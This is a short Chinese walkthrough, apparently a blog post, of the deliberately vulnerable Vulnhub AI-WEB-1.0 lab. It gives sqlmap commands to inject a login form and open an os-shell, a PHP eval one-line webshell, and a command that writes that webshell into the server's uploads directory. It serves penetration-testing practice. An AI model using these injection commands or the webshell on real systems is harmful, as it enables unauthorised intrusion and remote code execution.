【Vulnhub靶场AI-WEB-1.0打靶教程】

第一步:查看虚拟机的ip

第二步:扫描ip下开放的80端口

第三步:扫描查到的ip地址下的目录

第四步:访问查到的目录

访问robot.txt

第五步:访问robot.txt显示出的目录

第六步:打开kali终端,使用sqlmap功能

sqlmap -u "http://192.168.189.153/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --dbs --batch

查到数据库名

进行os-shell连接

sqlmap -u "http://192.168.189.153/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --os-shell

在kali里面/home/kali/目录下创建一个1.php写入一句话木马。语句如下:

php 复制代码
<?php @eval($_POST['pass']);?>

再打开一个终端页面输入命令

sqlmap -u "http://192.168.189.153/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

然后返回之前的终端页面输入命令ls查看目录,看到了木马文件上传成功

第七步:打卡蚁剑访问即可

相关推荐
宁zz17 小时前
乌班图安装jenkins
运维·jenkins
大丈夫立于天地间17 小时前
ISIS协议中的数据库同步
运维·网络·信息与通信
rainFFrain18 小时前
单例模式与线程安全
linux·运维·服务器·vscode·单例模式
@郭小茶20 小时前
docker-compose方式部署docker项目
运维·docker·容器
自由鬼20 小时前
开源虚拟化管理平台Proxmox VE部署超融合
linux·运维·服务器·开源·虚拟化·pve
电星托马斯21 小时前
Linux系统CentOS 6.3安装图文详解
linux·运维·服务器·程序人生·centos
啞謎专家21 小时前
CentOS中挂载新盘LVM指南:轻松扩展存储空间,解决磁盘容量不足问题
linux·运维·服务器
s_little_monster1 天前
【Linux】进程信号的捕捉处理
linux·运维·服务器·经验分享·笔记·学习·学习方法
一大Cpp1 天前
Ubuntu与本地用户交流是两种小方法
linux·运维·ubuntu